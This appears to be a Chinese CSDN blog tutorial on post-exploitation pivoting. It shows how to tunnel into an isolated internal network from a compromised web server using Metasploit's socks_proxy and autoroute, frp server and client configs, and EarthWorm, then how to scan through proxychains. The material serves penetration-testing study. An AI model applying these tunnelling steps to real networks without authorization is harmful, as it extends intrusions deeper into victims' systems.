【渗透测试】socks代理打穿内网

最新推荐文章于 2024-03-08 21:56:00 发布
最新推荐文章于 2024-03-08 21:56:00 发布
阅读量755 收藏 4
点赞数 2
文章标签: 网络 linux 运维 网络安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74272345/article/details/133465529
版权

在渗透测试中,当我们拿到web服务器的root控制权限时,发现web服务器的网卡信息存在与外界隔离的内网,如果要继续对内网进行渗透,我们就必须要建立起一个网络连接来连通自己的Kali和内网机器。

Socks是一种代理服务,可以简单地将一端的系统连接到另外一端,支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议,其标准端口为1080

对于socks代理的建立,收集了一些工具和方法

目录

msf

frp

Earthworm

msf

拿到meterpreter会话后,我们首先添加内网网段路由run autoroute 内网网段

然后使用socks_proxy开启一个socks代理服务

use auxiliary/server/socks_proxy 
options
set srvhost kali的ip
set srvport 1080
set version 4a

然后使用proxychains4连接socks代理服务,修改/etc/proxychains4.conf,添加SRVHOST SRVPORT

在对内网进行渗透的时候在命令前加上proxychains4就可以了,例如使用nmap对内网进行扫描

proxychains4 nmap 目标ip

frp

通过MSF建立socks代理的措施我们知道,首先需要部署一个socks服务,然后kali去连接这个服务,frp也是同样的道理

frp有两部分frps服务端和frpc客户端,使用frp进行socks代理时候,我们还需要有一个VPS来提供公网IP作为frps服务端。

  1. 在VPS建立frps,配置frps.ini
[common]
bind_port = 7000

token = Admin123
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = Aadmin@123
enable_prometheus = true

# frp日志配置
log_file = /var/log/frp/frps.log
log_level = info
log_max_days = 3

# 执行:
./frps -c frps.ini
  1. 在web服务器建立frpc,配置frpc.ini
[common]
server_addr = <your_vps_IP>
server_port = 7000
token = Admin123

[plugin_socks]
type = tcp
remote_port = 32123
plugin = socks5
plugin_user = fcarey
plugin_passwd = Aadmin@123
use_encryption = true
use_compression = true

# 执行:
./frpc -c frpc.ini
  1. 在Kali上继续使用proxychains连接socks服务
socks5          <your_vps_IP> 32123 fcarey Aadmin@123

我的理解就是frpc和frps建立起来一个流量隧道,然后使用proxychains建立起Kali与socks服务器的连接,但是frp存在多个版本,每个版本适配不同的架构,在渗透测试时需要注意版本问题,否则无法成功利用。

使用frp建立socks代理的流程及其繁琐,在配置ini文件、和上传frpc的版本特别需要细心,尤其是多层内网环境的时候,可以使用一个工具FastProxy快速的使用frp建立socks连接,无需关心版本架构问题,但需要注意适用靶场渗透,因为擦屁股很麻烦

GitHub - LxxxSec/FastProxy

该工具实际上装载了frp和fscan,使用python脚本自动化完成frp的步骤,ini设置仍然与上述一致

值得注意的是该工具需要flask库的支持,所以在目标机器上我们需要安装flask

使用方法:vps执行python3 app.py VPSIP port快速建立起frps服务

  • 第一行curl命令在目标机器执行
  • 第三行proxy在proxychains中设置

Earthworm

EW是一套便携式的网络穿透工具,具有SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,而且适用于不同的操作系统。

【教程】使用Earthworm (EW) 做Socks5代理完成内网穿透_ew下载 内网穿透-CSDN博客

安全攻防 | 网络代理之EarthWorm-腾讯云开发者社区-腾讯云

我的简单理解,就是在目标机器上建立socks服务,并将流量反弹回kali,kali仍然使用proxychains连接socks

WelK1n_
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python中使用socks5设置全局代理的方法示例
12-20
0x01介绍 PySocks使您可以通过SOCKS和HTTP代理服务器发送流量。它是SocksiPy的现代分支,具有错误修复和其他功能。 0x02 安装 λ pip3 install Pysocks 0x03 测试 正常请求,httperror无法获得 加入socks5代理后,可以获得当前程序的全局代理可以 正常访问 import socket import socks socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", 10808) socket.socket = socks.socksocket 0x04 测试代码 # -*-
rpivot:socks4反向代理,用于渗透测试
05-01
RPIVOT-反向袜子4渗透测试代理 RPIVOT允许通过套接字4将流量隧道传输到内部网络。它的工作方式类似于ssh动态端口转发,但方向相反。 描述 该工具与Python 2.6-2.7兼容,除了标准库外没有任何依赖项。 它具有客户端-服务器体系结构。 只需在要通过其建立隧道的计算机上运行客户端即可。 服务器应在pentester的计算机上启动,并侦听来自客户端的传入连接。 适用于Kali Linux,Solaris 10,Windows,Mac OS。 用法示例 在端口9999上启动服务器侦听器,从客户端连接后,它将在127.0.0.1:1080上创建socks 4代理: python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080 连接到服务器: p
内网安全:Socks 代理 -- 本地代理 技术.
最新发布
dzqxwzoe的博客
03-08 848
代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.本地代理:( MSF 跳板多个内网主机系列)两个内网通讯上线( Frp 自建跳板 )内网安全:Socks 代理 技术.两个内网通讯上线( Ngrok )(4)进行监听:(kali)(3)进行监听:(kali
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
1.内外网简单知识 2.内网 1 和内网 2 通信问题 3.正向反向协议通信连接问题 4.内网穿透代理隧道技术说明 2.测试:内网 1 执行后门-免费主机处理-
使用EW作Socks5代理进行内网渗透1
08-03
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
socks5代理配置及发送邮件.rar
12-31
文档详细描述,linux不通外网的情况下,通过在另一台通外网的服务器搭建socks5代理服务,不通外网的服务器通过socks5代理,成功向外网发送邮件的功能。
kali linux配置网络代理
热门推荐
weixin_51380973的博客
10-14 1万+
尽量不要ping www.google.com,由于各种目的地址和中间原因,可能不会响应。把"http://192.168.150.1:7890"替换成你的网络代理服务器。1、进入/etc/profile.d目录,新建文件proxy.sh ,内容如下。把"192.168.150.1"、"7890"替换成你的网络代理服务器和端口。3、检查网络代理服务器是否成功。2、检查网络代理服务器是否成功。
metasploit-内网穿透
qq_49694748的博客
01-11 3229
socks4a代理 端口转发 ·socks4a代理 实验拓扑 kali拿下web的shell并以此为跳板对内网进行渗透 模块:auxiliary/server/socks_proxy 设置srvhost和srvport为kali的IP地址和端口,注意默认版本是5,也可以设置成4a这点要区分,因为修改proxychains配置文件时会区别5和4a netstat查看是否监听 进行路由转发:post/multi/manage/autoroute 设置好session.
Neo-reGeorg通过socks5一层代理,访问内网系统-实战篇
千寻的博客
10-09 2182
假设:目前已获取边界服务器(192.168.0.103)的权限,远程管理服务器 实现:通过Neo-reGeorg,使得kali能够访问内网的192.168.93.40上的主机
内网安全:Socks 代理 || 本地代理 技术.
网络安全领域___专研者.
06-12 5544
Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
虚拟机内kali走主机代理
qq_44881113的博客
04-16 1万+
虚拟机内kali走主机代理 1 打开代理 2 将主机网络与虚拟机网络共享 现在我使用的是WLAN模式 所以我设置的是WLAN属性 3 打开代理软件 本地代理 允许来自局域网连接 4 虚拟机设置成NAT模式 5 配置proxychains4(Kali Linux 利用 proxychains4 配置实现网络代理加速外网访问) vim /etc/proxychains4.conf 注释掉strict_chain 将dynamic_chain注释符删掉 注释掉socks4 127.0.0.1 905
内网穿透之利用Neo-reGeorg工具完成socks5代理
li1136594919的博客
09-12 658
选择靶机能够解析的文件并将其上传到靶机web应用的目录上(使用浏览器访问确认其上传成功且目录正确),然后kali启动代理。修改/etc/proxychains.conf配置文件,将其他socks5代理注释掉,增加。此时firefox的所有流量都会通过burpsuite到达本地1080端口然后到靶机进行转发。利用firefox的foxyproxy插件新增到burpsuite的代理。利用firefox的foxyproxy插件新增到本地1080端口socks5的代理。使用前需要先生成key,进入项目目录,输入。
Linux kali 安装socks5(ss5)代理
柳似烟的专栏
11-22 1万+
环境为VMWare虚拟机,kali linux系统。 由于公司网络对局域网内的机器进行了MAC绑定,kali无法自动获取IP地址,所以需要手动设置IP地址:10.0.0.203,VMWare的网络使用的是桥接的模式,但此时的kali是无法上网的(网关不给10.0.0.203网络传输),只能在内部网络发送数据。要是使用NAT模式使用共享主机的IP地址是可以联网的,但是由于某些其它目的的需要不想这样
【终端配置代理(Windows和Kali)】
qq_46029678的博客
11-16 4009
1.打开终端,输入命令:export proxy_http=http://192.168.110.XX:10801。4.徽标键+R打开终端,ipconfig查看本机IP,记录下来等会配置会用到。根据具体情况配置http或者socks,此时的端口是局域网端口。根据具体情况配置http或者socks,此时的端口是本地端口。2.同样属于临时性设置,重新打开一个新终端配置会失效。2.这属于临时性设置,重新打开一个新终端配置会失效。在末尾添加你的设置,注意协议,IP和端口。添加dynamic_chain。
Kali-linux设置ProxyChains
2301_77162959的博客
05-09 2367
ProxyChains是Linux和其他Unices下的代理工具。它可以使任何程序通过代理上网,允许TCP和DNS通过代理隧道,支持HTTP、SOCKS4和SOCKS5类型的代理服务器,并且可配置多个代理。ProxyChains通过一个用户定义的代理列表强制连接指定的应用程序,直接断开接收方和发送方的连接。本节将介绍设置ProxyChains的方法。
kali内置超好用的代理工具proxychains
Eason_LYC安全白帽子的成长博客
03-21 8219
Kali Linux是一个流行的安全测试和渗透测试操作系统,而ProxyChains是其中一个非常有用的工具,它可以帮助用户在渗透测试期间隐藏其真实IP地址,以便更好地保护他们的匿名性和隐私。具体来说,ProxyChains是一个开源工具,它允许用户通过一个或多个代理服务器来路由TCP或UDP连接,从而隐藏其真实IP地址。该工具可以用于在不被发现的情况下执行各种网络操作,例如扫描和攻击,而无需揭示用户的位置和身份。
【proxychains4】虚拟机内kali走主机代理
记录学习,一起进步
06-27 4812
【proxychains4】虚拟机内kali走主机代理
内网渗透--frp代理设置与proxychains代理设置
隔壁山上小道士的博客
05-15 1万+
frp代理设置内网跳板机
内网渗透测试:利用 RDP 协议搭建 Socks5 代理隧道
Innocence_0的博客
08-20 648
如今,在很多组织机构内部,针对 DMZ 或隔离网络区域内的计算机设备,为了限制其它接入端口风险,通常只允许这些设备开启 3389端口,使用远程桌面来进行管理维护。那么我们能不能利用这个 3389 端口的 RDP 服务建立起一条通向内网代理隧道呢?当然可以,下面就引出我们今天的主角文中若有不当之处,还请各位大佬师傅们多多点评。
frp socks5代理 内网渗透
10-18
frp是一款高性能的反向代理工具,可以将内网服务映射到公网上,从而实现内网穿透。而socks5代理是一种网络协议,可以实现TCP、UDP等协议的代理转发。结合使用frp和socks5代理,可以实现内网渗透的目的。 具体实现方法如下: 1. 在公网服务器上安装frp,并配置好反向代理规则。 2.*** 在攻击机上使用socks5代理客户端连接内网机器的socks5代理服务,即可访问内网服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值